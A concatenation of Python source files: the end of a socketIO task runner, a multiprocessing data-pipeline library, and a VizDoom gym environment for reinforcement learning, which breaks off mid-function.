p = multiprocessing.Process(target=task_process, args=(args, self))
p.start()
def main():
if os.path.exists("temp_arg.json"):
os.remove("temp_arg.json")
for task in tasks:
task.prepare()
asio = async_socketIO(SocketIO('localhost', 30041))
sio_pspent_info = asio.socketIO.define(Pspnet_namespace, '/pspnet')
asio.background()
while (1):
for task in tasks:
if task.mainthread:
task.run()
#mutex2.put("success",block=True)
#except:
# pass
if __name__ == "__main__":
main()
|
pipeline.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import ctypes
import inspect
from multiprocessing import Queue, Process, Value
import logging
import collections
from threading import Thread
import time
import traceback
from counter import AtomicCounter
def _get_logger(name):
logger = logging.getLogger(name)
logger.addHandler(logging.NullHandler())
return logger
def create_process_with(process_alias=None, target_func=None, daemon=True, **kwargs):
process = Process(name=process_alias, target=target_func, kwargs=kwargs)
process.daemon = daemon
return process
def func_to_be_invoked_with_new_process(target_pipe=None, pipeline_running_status=None):
target_pipe.info("start a process")
target_pipe.open(pipeline_running_status=pipeline_running_status)
target_pipe.info("end a process")
return
class Pipeline:
END_OF_STREAM_SIGNAL = "!end_of_stream!"
RUNNING_STATUS_STANDBY = 0
RUNNING_STATUS_RUNNING = 1
RUNNING_STATUS_FINISH = 2
RUNNING_STATUS_INTERRUPTED = -999
@staticmethod
def is_end_of_stream(data):
return data == Pipeline.END_OF_STREAM_SIGNAL
def __init__(self, alias=None):
self.logger = _get_logger(__name__)
self._alias = alias
self._pipe_builders = []
self._pipes = {}
self._pipe_processes = []
self._first_pipe = None
self._last_pipe = None
self._func_read_stream = (lambda: range(0))
self._cleanups = []
self._already_cleanup = Value(ctypes.c_bool, False)
self._running_status = Value(ctypes.c_int, Pipeline.RUNNING_STATUS_STANDBY)
self._interrupted_by_exception = False
self._thread_watching_running_status = None
self._thread_watching_remaining_processes = None
self._stream_reader_process = None
def reset(self):
self._pipes = {}
self._pipe_processes = []
self._first_pipe = None
self._last_pipe = None
self._func_read_stream = (lambda: range(0))
self._cleanups = []
self._already_cleanup = Value(ctypes.c_bool, False)
self._running_status = Value(ctypes.c_int, Pipeline.RUNNING_STATUS_STANDBY)
self._interrupted_by_exception = False
self._thread_watching_running_status = None
self._thread_watching_remaining_processes = None
self._stream_reader_process = None
def add(self, builder):
"""
:param builder:
:return: Pipeline
"""
self._pipe_builders.append(builder)
return self
def stream(self, generator=None):
"""
start to stream data from generator into pipeline, yielding data passed through pipeline
:param generator: Iterable or Generator implementation
:return:
"""
self._check_if_runnable()
try:
# change running status
self._mark_started()
# determine stream generator
self._configure_stream_reader(generator)
# configure pipes and create processes for them
self._configure_pipes()
# open pipes in a new process respectably
self._open_pipes()
# start process reading stream from generator
self._start_streaming_data()
# yield data passed through this pipeline
self.logger.info("start to yield streams passed through pipeline...")
while True:
message = self._last_pipe.outbound.get()
if Pipeline.is_end_of_stream(message):
break
yield message
self.logger.info("finished yielding streams passed through pipeline")
# if interrupted
if self._interrupted_by_exception:
raise Exception("processing was interrupted by unexpected exception")
self.logger.info("finished successfully")
finally:
self._cleanup()
def _mark_started(self):
self.set_running_status_to_running()
self._add_running_status_reset_func_to_cleanup()
self._configure_running_status_watcher()
def _add_running_status_reset_func_to_cleanup(self):
def cleanup_func_reset_running_status():
with self._running_status.get_lock():
if self.running_status != Pipeline.RUNNING_STATUS_INTERRUPTED:
self.set_running_status_to_finish()
self._add_cleanup_func("reset running status of pipeline",
cleanup_func_reset_running_status)
def _configure_running_status_watcher(self):
def watch_running_status(pipeline=None):
pipeline.logger.info("start thread watching running status...")
while True:
if pipeline.running_status == Pipeline.RUNNING_STATUS_INTERRUPTED:
pipeline.logger.error("got an interruption, stops pipeline, see logs")
pipeline._interrupted_by_exception = True
pipeline.stop_force()
pipeline.set_running_status_to_finish()
break
elif pipeline.running_status == Pipeline.RUNNING_STATUS_FINISH:
break
time.sleep(0.001)
pipeline.logger.info("stop thread watching running status")
self._thread_watching_running_status = Thread(
name="running_status_watcher",
target=watch_running_status,
kwargs={"pipeline": self})
self._thread_watching_running_status.daemon = True
self._thread_watching_running_status.start()
def _start_streaming_data(self):
self.logger.info("start process for streaming data into pipeline...")
self._add_cleanup_func("terminate the stream reader process",
lambda: self._stream_reader_process.terminate())
self._stream_reader_process.start()
def _open_pipes(self):
self.logger.info("start Processes for pipes(%s)...", len(self._pipe_processes))
map(lambda process: process.start(),
reduce(lambda p_group1, p_group2: p_group1 + p_group2, self._pipe_processes, []))
self._add_cleanup_func("terminate all the pipe processes",
lambda: map(lambda each_p: each_p.terminate(),
reduce(lambda p1, p2: p1 + p2, self._pipe_processes, [])))
def _configure_stream_reader(self, generator):
if isinstance(generator, DataGenerator):
self._func_read_stream = generator.produce
elif isinstance(generator, collections.Iterable):
self._func_read_stream = (lambda: generator)
elif inspect.isgeneratorfunction(generator):
self._func_read_stream = generator
else:
raise Exception("generator should be either Producer or Iterable")
self._stream_reader_process = create_process_with(
process_alias="stream_reader",
target_func=lambda: self._read_and_stream_from_generator())
def _check_if_runnable(self):
# check running status
if self.running_status != Pipeline.RUNNING_STATUS_STANDBY:
raise Exception("invalid running status. Call reset() before call this")
def _configure_pipes(self):
if self._pipe_builders is None or len(self._pipe_builders) <= 0:
raise Exception("There are no pipes to stream data")
# chaining pipes
pipes = []
pipe_outbound = Queue()
self._pipe_builders.reverse()
for builder in self._pipe_builders:
pipe = builder.build()
pipe.outbound = pipe_outbound
pipes.append(pipe)
pipe_outbound = pipe.inbound
self._pipe_builders.reverse()
pipes.reverse()
self._pipes = pipes
# capture entry and terminal
self._first_pipe = self._pipes[0]
self._last_pipe = self._pipes[-1]
processes = []
for pipe in self._pipes:
processes_for_pipe = map(lambda i: create_process_with(process_alias="process-%s-%s" % (pipe.alias, i),
target_func=func_to_be_invoked_with_new_process,
target_pipe=pipe,
pipeline_running_status=self._running_status),
range(pipe.number_of_consumer))
processes.append(processes_for_pipe)
self._pipe_processes = processes
def _read_and_stream_from_generator(self):
try:
map(lambda m: self.__stream_data(m), self._func_read_stream())
self.__stream_data(Pipeline.END_OF_STREAM_SIGNAL)
except Exception as e:
self.logger.error("while reading stream from generator, an unexpected exception occurred, stopping pipeline. "
"see cause -> %s\n%s", e, traceback.format_exc())
self.set_running_status_to_interrupted()
def __stream_data(self, data):
self._first_pipe.inbound.put(data)
def _join_pipes(self):
def watch_remaining_processes(pipeline=None, processes=None):
pipeline.logger.info("start thread watching pipe processes remaining...")
while True:
processes_alive = filter(lambda p: p.is_alive(), reduce(lambda plist1, plist2: plist1 + plist2, processes, []))
if len(processes_alive) <= 0:
pipeline.logger.info("no remaining processes")
break
else:
pipeline.logger.info("%s remaining processes : %s", len(processes_alive),
map(lambda p: (p.pid, p.name), processes_alive))
time.sleep(5)
pipeline.logger.info("stop thread watching pipe processes remaining")
self._thread_watching_remaining_processes = Thread(
name="remaining_processes_watcher",
target=watch_remaining_processes,
kwargs={"pipeline": self,
"processes": self._pipe_processes}
)
self._thread_watching_remaining_processes.daemon = True
self._thread_watching_remaining_processes.start()
map(lambda p:
self.logger.info("joining(waiting) the process(name:%s, id:%s, alive:%s)...", p.name, p.pid, p.is_alive())
or p.join()
or self.logger.info("released joining the process(name:%s, id:%s, alive:%s)", p.name, p.pid, p.is_alive()),
reduce(lambda plist1, plist2: plist1 + plist2, self._pipe_processes, []))
self._thread_watching_remaining_processes.join()
def _add_cleanup_func(self, desc="", func=(lambda: None)):
"""
:rtype : object
"""
self._cleanups.append((desc, func))
def _cleanup(self):
with self._already_cleanup.get_lock():
if self._already_cleanup.value:
return
self.logger.info("start cleaning up...")
map(lambda cleanup_tuple:
self.logger.info("call cleanup func -> %s", cleanup_tuple[0])
or cleanup_tuple[1](),
self._cleanups)
self.logger.info("finished cleaning up")
self._already_cleanup.value = True
def stop_force(self):
"""
terminate all spawned processes
:return: void
"""
# call registered cleanups
self._cleanup()
# send end signal to terminal queue for pipeline
self._last_pipe.outbound.put(Pipeline.END_OF_STREAM_SIGNAL)
@property
def running_status(self):
return self._running_status.value
def set_running_status_to_standby(self):
self._set_running_status(Pipeline.RUNNING_STATUS_STANDBY)
def set_running_status_to_running(self):
self._set_running_status(Pipeline.RUNNING_STATUS_RUNNING)
def set_running_status_to_finish(self):
self._set_running_status(Pipeline.RUNNING_STATUS_FINISH)
def set_running_status_to_interrupted(self):
self._set_running_status(Pipeline.RUNNING_STATUS_INTERRUPTED)
def _set_running_status(self, value):
with self._running_status.get_lock():
self._running_status.value = value
class Pipe(object):
def __init__(self, alias=None,
consumer=None,
buffer_size=0,
number_of_consumer=1,
skip_on_error=False,
inbound_counter=None,
outbound_counter=None,
consumer_exception_handler=None,
**kwargs):
self._alias = alias
self._logger = _get_logger(__name__)
self._buffer_size = buffer_size
self._consumer = consumer
self._number_of_consumer = number_of_consumer
self._active_consumer_counter = AtomicCounter()
self._skip_on_error = skip_on_error
self._inbound_counter = inbound_counter if inbound_counter is not None else AtomicCounter()
self._outbound_counter = outbound_counter if outbound_counter is not None else AtomicCounter()
self._inbound = Queue(self._buffer_size)
self._outbound = None
self._consumer_exception_handler = consumer_exception_handler
self._additional_properties = kwargs
def open(self, pipeline_running_status=None):
with self._active_consumer_counter.lock:
self._active_consumer_counter.increase()
self.info("open consumer, %s of %s consumer(s)", self._active_consumer_counter.value,
self._number_of_consumer)
try:
map(
lambda message: self._downstream(message),
self._read_consume_yield(self._read_from_stream)
)
except Exception as e:
self._handle_exception(exception=e, pipeline_running_status=pipeline_running_status)
with self._active_consumer_counter.lock:
self._active_consumer_counter.decrease()
self.info("close consumer, %s consumer(s) remaining", self._active_consumer_counter.value)
def _read_from_stream(self):
message = self._inbound.get()
self.debug("<< %s", message)
if Pipeline.is_end_of_stream(message):
self.info("<< %s", message)
with self._active_consumer_counter.lock:
if self._active_consumer_counter.value > 1:
# re-product end of stream signal for other sibling pipe processes
self._inbound.put(message)
else:
self._inbound_counter.increase()
return message
def _downstream(self, message=None):
"""
pass messages to the next pipe,
notice that if and only if when this is the last consumer of a pipe, it streams end of stream signal to next pipe.
:param message: data processed in this pipe
"""
if not Pipeline.is_end_of_stream(message):
self._outbound_counter.increase()
if self._outbound is None:
return
if Pipeline.is_end_of_stream(message):
# if and only if current pipe process is the last one remaining, send end-of-stream signal downstream.
with self._active_consumer_counter.lock:
if self._active_consumer_counter.value <= 1:
self._outbound.put(message)
self.info(">> %s", message)
else:
self._outbound.put(message)
self.debug(">> %s", message)
def _read_consume_yield(self, func_read_from_upstream):
return []
def _handle_consumer_exception(self, consumer_exception, message):
if self._consumer_exception_handler is None:
return False
try:
self._consumer_exception_handler(consumer_exception, message)
return True
except Exception as e:
self.warn("failed to invoke a consumer exception handler with a consumer exception. see cause -> %s", e.message)
return False
def _handle_exception(self, exception=None, pipeline_running_status=None):
with pipeline_running_status.get_lock():
if pipeline_running_status.value == Pipeline.RUNNING_STATUS_INTERRUPTED:
return
else:
pipeline_running_status.value = Pipeline.RUNNING_STATUS_INTERRUPTED
self.error("when processing data stream on pipeline, an unexpected exception has occurred. "
"This will cause this pipeline to stop. see cause -> %s\n%s",
exception,
traceback.format_exc())
def debug(self, message, *args, **kwargs):
self._log(logging.DEBUG, message, *args, **kwargs)
def info(self, message, *args, **kwargs):
self._log(logging.INFO, message, *args, **kwargs)
def warn(self, message, *args, **kwargs):
self._log(logging.WARNING, message, *args, **kwargs)
def error(self, message, *args, **kwargs):
self._log(logging.ERROR, message, *args, **kwargs)
def _log(self, level, message, *args, **kwargs):
self._logger.log(level, message, *args, **kwargs)
@property
def alias(self):
return self._alias
@property
def inbound(self):
return self._inbound
@property
def outbound(self):
return self._outbound
@outbound.setter
def outbound(self, outbound):
self._outbound = outbound
@property
def number_of_consumer(self):
return self._number_of_consumer
@property
def skip_on_error(self):
return self._skip_on_error
@property
def additional_properties(self):
return self._additional_properties
def inbound_count(self):
return self._inbound_counter.value
def outbound_count(self):
return self._outbound_counter.value
class DefaultPipe(Pipe):
def __init__(self,
alias=None,
consumer=None,
number_of_consumer=1,
skip_on_error=False,
buffer_size=0,
consumer_exception_handler=None,
aggregation_size=1
):
super(DefaultPipe, self).__init__(alias=alias, consumer=consumer, number_of_consumer=number_of_consumer,
skip_on_error=skip_on_error, buffer_size=buffer_size,
consumer_exception_handler=consumer_exception_handler)
self._aggregation_size = aggregation_size
self._aggregation_buffer = []
self._aggregation_count = 0
def _read_consume_yield(self, read_one_from_stream):
while True:
message = read_one_from_stream()
# check end of stream
if Pipeline.is_end_of_stream(message):
# flush aggregation buffer
if self._aggregation_size > 1 and self._aggregation_count >= 1:
yield self._aggregation_buffer
self._aggregation_count = 0
self._aggregation_buffer = []
# stream end of stream signal downstream
yield message
break
# delegate message to consumer
processed_message = message
if self._consumer is not None:
try:
processed_message = self._consumer.consume(message) if isinstance(self._consumer, Consumer) else self._consumer(message)
self.debug("processed %s to %s", message, processed_message)
except Exception as e:
handled = self._handle_consumer_exception(e, message)
if self._skip_on_error:
if not handled:
self.warn("failed to consume a message(%s). see cause -> %s ", message, e)
else:
raise ConsumerException(message="failed to consume message",
cause=e,
data=message,
stacktrace=traceback.format_exc())
if processed_message is None:
continue
# emit downstream
if self._aggregation_size <= 1:
yield processed_message
continue
self._aggregation_count += 1
self._aggregation_buffer.append(processed_message)
if self._aggregation_count >= self._aggregation_size:
yield self._aggregation_buffer
self._aggregation_count = 0
self._aggregation_buffer = []
class Consumer(object):
def __init__(self, alias):
self._alias = alias
def consume(self, message):
pass
class DataGenerator(object):
def __init__(self):
pass
def produce(self):
"""
have to yield each data to stream into pipeline
:return: any type of data
"""
pass
class PipeBuilder(object):
PIPE_CLS = 'pipe'
ALIAS = 'alias'
CONSUMER = "consumer"
NUMBER_OF_CONSUMER = "number_of_consumer"
BUFFER_SIZE = "buffer_size"
SKIP_ON_ERROR = "skip_on_error"
INBOUND_COUNTER = "inbound_counter"
OUTBOUND_COUNTER = "outbound_counter"
AGGREGATION_SIZE = "aggregation_size"
CONSUMER_EXCEPTION_HANDLER = "consumer_exception_handler"
def __init__(self, alias=None, pipe_cls=DefaultPipe):
self._properties = {}
self.alias(alias)
self.pipe_cls(pipe_cls)
def pipe_cls(self, pipe_cls):
self.set(PipeBuilder.PIPE_CLS, pipe_cls)
return self
def alias(self, alias):
self.set(PipeBuilder.ALIAS, alias)
return self
def consumer(self, consumer):
self.set(PipeBuilder.CONSUMER, consumer)
return self
def number_of_consumer(self, number_of_consumer):
self.set(PipeBuilder.NUMBER_OF_CONSUMER, number_of_consumer)
return self
def buffer_size(self, skip_on_error):
self.set(PipeBuilder.BUFFER_SIZE, skip_on_error)
return self
def inbound_counter(self, counter):
self.set(PipeBuilder.INBOUND_COUNTER, counter)
return self
def outbound_counter(self, counter):
self.set(PipeBuilder.OUTBOUND_COUNTER, counter)
return self
def aggregation_size(self, aggregation_size):
self.set(PipeBuilder.AGGREGATION_SIZE, aggregation_size)
return self
def consumer_exception_handler(self, consumer_exception_handler):
self.set(PipeBuilder.CONSUMER_EXCEPTION_HANDLER, consumer_exception_handler)
return self
def set(self, attr, value):
self._properties[attr] = value
def get(self, attr):
return self._properties[attr]
def exists(self, attr):
return attr in self._properties
def build(self):
pipe_kwargs = dict(filter(lambda item: item[0] != PipeBuilder.PIPE_CLS, self._properties.items()))
return self._properties[PipeBuilder.PIPE_CLS](**pipe_kwargs)
class ConsumerException(Exception):
def __init__(self,
message=None,
cause=None,
data=None,
stacktrace=None):
self.message = message
self.cause = cause
self.data = data
self.stacktrace = data
super(ConsumerException, self).__init__(message, cause, data, stacktrace)
|
doom_gym.py
|
import copy
import os
import random
import re
import time
from os.path import join
from threading import Thread
import cv2
import gym
import numpy as np
from filelock import FileLock, Timeout
from gym.utils import seeding
from vizdoom.vizdoom import ScreenResolution, DoomGame, Mode, AutomapMode
from seed_rl.algorithms.utils.spaces.discretized import Discretized
from seed_rl.utils.utils import log, project_tmp_dir
def doom_lock_file(max_parallel):
"""
Doom instances tend to have problems starting when a lot of them are initialized in parallel.
This is not a problem during normal execution once the envs are initialized.
The "sweet spot" for the number of envs that can be initialized in parallel is about 5-10.
Here we use file locking mechanism to ensure that only a limited amount of envs are being initialized at the same
time.
This tends to be more of a problem for multiplayer envs.
This also has an advantage of working across completely independent process groups, e.g. different experiments.
"""
lock_filename = f'doom_{random.randrange(0, max_parallel):03d}.lockfile'
tmp_dir = project_tmp_dir()
lock_path = join(tmp_dir, lock_filename)
return lock_path
def key_to_action_default(key):
"""
MOVE_FORWARD
MOVE_BACKWARD
MOVE_RIGHT
MOVE_LEFT
SELECT_WEAPON1
SELECT_WEAPON2
SELECT_WEAPON3
SELECT_WEAPON4
SELECT_WEAPON5
SELECT_WEAPON6
SELECT_WEAPON7
ATTACK
SPEED
TURN_LEFT_RIGHT_DELTA
"""
from pynput.keyboard import Key
# health gathering
action_table = {
Key.left: 0,
Key.right: 1,
Key.up: 2,
Key.down: 3,
}
# action_table = {
# Key.up: 0,
# Key.down: 1,
# Key.alt: 6,
# Key.ctrl: 11,
# Key.shift: 12,
# Key.space: 13,
# Key.right: 'turn_right',
# Key.left: 'turn_left',
# }
return action_table.get(key, None)
class VizdoomEnv(gym.Env):
def __init__(self,
action_space,
config_file,
coord_limits=None,
max_histogram_length=200,
show_automap=False,
skip_frames=1,
async_mode=False,
record_to=None):
self.initialized = False
# essential game data
self.game = None
self.state = None
self.curr_seed = 0
self.rng = None
self.skip_frames = skip_frames
self.async_mode = async_mode
# optional - for topdown view rendering and visitation heatmaps
self.show_automap = show_automap
self.coord_limits = coord_limits
# can be adjusted after the environment is created (but before any reset() call) via observation space wrapper
self.screen_w, self.screen_h, self.channels = 640, 480, 3
self.screen_resolution = ScreenResolution.RES_640X480
self.calc_observation_space()
self.black_screen = None
# provided as a part of environment definition, since these depend on the scenario and
# can be quite complex multi-discrete spaces
self.action_space = action_space
self.composite_action_space = hasattr(self.action_space, 'spaces')
self.delta_actions_scaling_factor = 7.5
scenarios_dir = join(os.path.dirname(__file__), 'scenarios')
self.config_path = join(scenarios_dir, config_file)
self.variable_indices = self._parse_variable_indices(self.config_path)
# only created if we call render() method
self.viewer = None
# record full episodes using VizDoom recording functionality
self.record_to = record_to
self.is_multiplayer = False # overridden in derived classes
# (optional) histogram to track positional coverage
# do not pass coord_limits if you don't need this, to avoid extra calculation
self.max_histogram_length = max_histogram_length
self.current_histogram, self.previous_histogram = None, None
if self.coord_limits:
x = (self.coord_limits[2] - self.coord_limits[0])
y = (self.coord_limits[3] - self.coord_limits[1])
if x > y:
len_x = self.max_histogram_length
len_y = int((y / x) * self.max_histogram_length)
else:
len_x = int((x / y) * self.max_histogram_length)
len_y = self.max_histogram_length
self.current_histogram = np.zeros((len_x, len_y), dtype=np.int32)
self.previous_histogram = np.zeros_like(self.current_histogram)
# helpers for human play with pynput keyboard input
self._terminate = False
self._current_actions = []
self._actions_flattened = None
self._prev_info = None
self._last_episode_info = None
self._num_episodes = 0
self.mode = 'algo'
self.seed()
def seed(self, seed=None):
self.curr_seed = seeding.hash_seed(seed, max_bytes=4)
self.rng, _ = seeding.np_random(seed=self.curr_seed)
return [self.curr_seed, self.rng]
def calc_observation_space(self):
self.observation_space = gym.spaces.Box(0, 255, (self.screen_h, self.screen_w, self.channels), dtype=np.uint8)
def _set_game_mode(self, mode):
if mode == 'replay':
self.game.set_mode(Mode.PLAYER)
else:
if self.async_mode:
log.info('Starting in async mode! Use this only for testing, otherwise PLAYER mode is much faster')
self.game.set_mode(Mode.ASYNC_PLAYER)
else:
self.game.set_mode(Mode.PLAYER)
def _create_doom_game(self, mode):
self.game = DoomGame()
self.game.load_config(self.config_path)
self.game.set_screen_resolution(self.screen_resolution)
self.game.set_seed(self.rng.randint(0, 2**32 - 1))
if mode == 'algo':
self.game.set_window_visible(False)
elif mode == 'human' or mode == 'replay':
self.game.add_game_args('+freelook 1')
self.game.set_window_visible(True)
else:
raise Exception('Unsupported mode')
self._set_game_mode(mode)
def _game_init(self, with_locking=True, max_parallel=10):
lock_file = lock = None
if with_locking:
lock_file = doom_lock_file(max_parallel)
lock = FileLock(lock_file)
init_attempt = 0
while True:
init_attempt += 1
try:
if with_locking:
with lock.acquire(timeout=20):
self.game.init()
else:
self.game.init()
break
except Timeout:
if with_locking:
log.debug(
'Another process currently holds the lock %s, attempt: %d', lock_file, init_attempt,
)
except Exception as exc:
log.warning('VizDoom game.init() threw an exception %r. Terminate process...', exc)
from seed_rl.envs.env_utils import EnvCriticalError
raise EnvCriticalError()
def initialize(self):
self._create_doom_game(self.mode)
# (optional) top-down view provided by the game engine
if self.show_automap:
self.game.set_automap_buffer_enabled(True)
self.game.set_automap_mode(AutomapMode.OBJECTS)
self.game.set_automap_rotate(False)
self.game.set_automap_render_textures(False)
# self.game.add_game_args("+am_restorecolors")
# self.game.add_game_args("+am_followplayer 1")
background_color = 'ffffff'
self.game.add_game_args('+viz_am_center 1')
self.game.add_game_args('+am_backcolor ' + background_color)
self.game.add_game_args('+am_tswallcolor dddddd')
# self.game.add_game_args("+am_showthingsprites 0")
self.game.add_game_args('+am_yourcolor ' + background_color)
self.game.add_game_args('+am_cheat 0')
self.game.add_game_args('+am_thingcolor 0000ff') # player color
self.game.add_game_args('+am_thingcolor_item 00ff00')
# self.game.add_game_args("+am_thingcolor_citem 00ff00")
self._game_init()
self.initialized = True
def _ensure_initialized(self):
if not self.initialized:
self.initialize()
@staticmethod
def _parse_variable_indices(config):
with open(config, 'r') as config_file:
lines = config_file.readlines()
lines = [l.strip() for l in lines]
variable_indices = {}
for line in lines:
if line.startswith('#'):
continue # comment
variables_syntax = r'available_game_variables[\s]*=[\s]*\{(.*)\}'
match = re.match(variables_syntax, line)
if match is not None:
variables_str = match.groups()[0]
variables_str = variables_str.strip()
variables = variables_str.split(' ')
for i, variable in enumerate(variables):
variable_indices[variable] = i
break
return variable_indices
def _black_screen(self):
if self.black_screen is None:
self.black_screen = np.zeros(self.observation_space.shape, dtype=np.uint8)
return self.black_screen
def _game_variables_dict(self, state):
game_variables = state.game_variables
variables = {}
for variable, idx in self.variable_indices.items():
variables[variable] = game_variables[idx]
return variables
def demo_path(self, episode_idx):
demo_name = f'e{episode_idx:03d}.lmp'
demo_path = join(self.record_to, demo_name)
demo_path = os.path.normpath(demo_path)
return demo_path
def reset(self):
self._ensure_initialized()
if self.record_to is not None and not self.is_multiplayer:
# does not work in multiplayer (uses different mechanism)
if not os.path.exists(self.record_to):
os.makedirs(self.record_to)
demo_path = self.demo_path(self._num_episodes)
log.warning('Recording episode demo to %s', demo_path)
self.game.new_episode(demo_path)
else:
if self._num_episodes > 0:
# no demo recording (default)
self.game.new_episode()
self.state = self.game.get_state()
img = None
try:
img = self.state.screen_buffer
except AttributeError:
# sometimes Doom does not return screen buffer at all??? Rare bug
pass
if img is None:
log.error('Game returned None screen buffer! This is not supposed to happen!')
img = self._black_screen()
# Swap current and previous histogram
if self.current_histogram is not None and self.previous_histogram is not None:
swap = self.current_histogram
self.current_histogram = self.previous_histogram
self.previous_histogram = swap
self.current_histogram.fill(0)
self._actions_flattened = None
self._last_episode_info = copy.deepcopy(self._prev_info)
self._prev_info = None
self._num_episodes += 1
return np.transpose(img, (1, 2, 0))
def _convert_actions(self, actions):
"""Convert actions from gym action space to the action space expected by Doom game."""
if self.composite_action_space:
# composite action space with multiple subspaces
spaces = self.action_space.spaces
else:
# simple action space, e.g. Discrete. We still treat it like composite of length 1
spaces = (self.action_space, )
actions = (actions, )
actions_flattened = []
for i, action in enumerate(actions):
if isinstance(spaces[i], Discretized):
# discretized continuous action
# check discretized first because it's a subclass of gym.spaces.Discrete
# the order of if clauses here matters! DON'T CHANGE THE ORDER OF IFS!
continuous_action = spaces[i].to_continuous(action)
actions_flattened.append(continuous_action)
elif isinstance(spaces[i], gym.spaces.Discrete):
# standard discrete action
num_non_idle_actions = spaces[i].n - 1
action_one_hot = np.zeros(num_non_idle_actions, dtype=np.uint8)
if action > 0:
action_one_hot[action - 1] = 1 # 0th action in each subspace is a no-op
actions_flattened.extend(action_one_hot)
elif isinstance(spaces[i], gym.spaces.Box):
# continuous action
actions_flattened.extend(list(action * self.delta_actions_scaling_factor))
else:
raise NotImplementedError(f'Action subspace type {type(spaces[i])} is not supported!')
return actions_flattened
def _vizdoom_variables_bug_workaround(self, info, done):
"""Some variables don't get reset to zero on game.new_episode(). This fixes it (also check overflow?)."""
if done and 'DAMAGECOUNT' in info:
log.info('DAMAGECOUNT value on done: %r', info.get('DAMAGECOUNT'))
if self._last_episode_info is not None:
bugged_vars = ['DEATHCOUNT', 'HITCOUNT', 'DAMAGECOUNT']
for v in bugged_vars:
if v in info:
info[v] -= self._last_episode_info.get(v, 0)
def _process_game_step(self, state, done, info):
if not done:
observation = np.transpose(state.screen_buffer, (1, 2, 0))
game_variables = self._game_variables_dict(state)
info.update(self.get_info(game_variables))
self._update_histogram(info)
self._prev_info = copy.deepcopy(info)
else:
observation = self._black_screen()
# when done=True Doom does not allow us to call get_info, so we provide info from the last frame
info.update(self._prev_info)
self._vizdoom_variables_bug_workaround(info, done)
return observation, done, info
def step(self, actions):
"""
Action is either a single value (discrete, one-hot), or a tuple with an action for each of the
discrete action subspaces.
"""
if self._actions_flattened is not None:
# provided externally, e.g. via human play
actions_flattened = self._actions_flattened
self._actions_flattened = None
else:
actions_flattened = self._convert_actions(actions)
default_info = {'num_frames': self.skip_frames}
reward = self.game.make_action(actions_flattened, self.skip_frames)
state = self.game.get_state()
done = self.game.is_episode_finished()
observation, done, info = self._process_game_step(state, done, default_info)
return observation, reward, done, info
def render(self, mode='human'):
try:
img = self.game.get_state().screen_buffer
img = np.transpose(img, [1, 2, 0])
if mode == 'rgb_array':
return img
h, w = img.shape[:2]
render_w = 1280
if w < render_w:
render_h = int(render_w * h / w)
img = cv2.resize(img, (render_w, render_h))
if self.viewer is None:
from gym.envs.classic_control import rendering
self.viewer = rendering.SimpleImageViewer(maxwidth=render_w)
self.viewer.imshow(img)
return img
except AttributeError:
return None
def close(self):
try:
if self.game is not None:
self.game.close()
except RuntimeError as exc:
log.warning('Runtime error in VizDoom game close(): %r', exc)
if self.viewer is not None:
self.viewer.close()
def get_info(self, variables=None):
if variables is None:
variables = self._game_variables_dict(self.game.get_state())
info_dict = {'pos': self.get_positions(variables)}
info_dict.update(variables)
return info_dict
def get_info_all(self, variables=None):
if variables is None:
variables = self._game_variables_dict(self.game.get_state())
info = self.get_info(variables)
if self.previous_histogram is not None:
info['previous_histogram'] = self.previous_histogram
return info
def get_positions(self, variables):
return self._get_positions(variables)
@staticmethod
def _get_positions(variables):
have_coord_data = True
required_vars = ['POSITION_X', 'POSITION_Y', 'ANGLE']
for required_var in required_vars:
if required_var not in variables:
have_coord_data = False
break
x = y = a = np.nan
if have_coord_data:
x = variables['POSITION_X']
y = variables['POSITION_Y']
a = variables['ANGLE']
return {'agent_x': x, 'agent_y': y, 'agent_a': a}
def get_automap_buffer(self):
if self.game.is_episode_finished():
return None
state = self.game.get_state()
map_ = state.automap_buffer
map_ = np.swapaxes(map_, 0, 2)
map_ = np.swapaxes(map_, 0, 1)
return map_
def _update_histogram(self, info, eps=1e-8):
if self.current_histogram is None:
return
agent_x, agent_y = info['pos']['agent_x'], info['pos']['agent_y']
# Get agent coordinates normalized to [0, 1]
dx = (agent_x - self.coord_limits[0]) / (self.coord_limits[2] - self.coord_limits[0])
dy = (agent_y - self.coord_limits[1]) / (self.coord_limits[3] - self.coord_limits[1])
# Rescale coordinates to histogram dimensions
# Subtract eps to exclude upper bound of dx, dy
dx = int((dx - eps) * self.current_histogram.shape[0])
dy = int((dy - eps) * self.current_histogram.shape[1])
self.current_histogram[dx, dy] += 1
def _key_to_action(self, key):
if hasattr(self.action_space, 'key_to_action'):
return self.action_space.key_to_action(key)
else:
return key_to_action_default(key)
def _keyboard_on_press(self, key):
from pynput.keyboard import Key
if key == Key.esc:
self._terminate = True
return False
action = self._key_to_action(key)
if action is not None:
if action not in self._current_actions:
self._current_actions.append(action)
def _keyboard_on_release(self, key):
action = self._key_to_action(key)
if action is not None:
if action in self._current_actions:
self._current_actions.remove(action)
# noinspection PyProtectedMember
@staticmethod
def play_human_mode(env, skip_frames=1, num_episodes=3, num_actions=None):
from pynput.keyboard import Listener
doom = env.unwrapped
doom.skip_frames = 1 # handled by this script separately
# noinspection PyProtectedMember
def start_listener():
with Listener(on_press=doom._keyboard_on_press, on_release=doom._keyboard_on_release) as listener:
listener.join()
listener_thread = Thread(target=start_listener)
listener_thread.start()
for episode in range(num_episodes):
doom.mode = 'human'
env.reset()
last_render_time = time.time()
time_between_frames = 1.0 / 35.0
total_rew = 0.0
while not doom.game.is_episode_finished() and not doom._terminate:
num_actions = 14 if num_actions is None else num_actions
turn_delta_action_idx = num_actions - 1
actions = [0] * num_actions
for action in doom._current_actions:
if isinstance(action, int):
actions[action] = 1 # 1 for buttons currently pressed, 0 otherwise
else:
if action == 'turn_left':
actions[turn_delta_action_idx] = -doom.delta_actions_scaling_factor
elif action == 'turn_right':
actions[turn_delta_action_idx] = doom.delta_actions_scaling_factor
for frame in range(skip_frames):
doom._actions_flattened = actions
_, rew, _, _ = env.step(actions)
new_total_rew = total_rew + rew
if new_total_rew != total_rew:
log.info('Reward: %.3f, total: %.3f', rew, new_total_rew)
total_rew = new_total_rew
state = doom.game.get_state()
verbose = True
if state is not None and verbose:
info = doom.get_info()
print(
'Health:', info['HEALTH'],
# 'Weapon:', info['SELECTED_WEAPON'],
# 'ready:', info['ATTACK_READY'],
# 'ammo:', info['SELECTED_WEAPON_AMMO'],
# 'pc:', info['PLAYER_COUNT'],
# 'dmg:', info['DAMAGECOUNT'],
)
time_since_last_render = time.time() - last_render_time
time_wait = time_between_frames - time_since_last_render
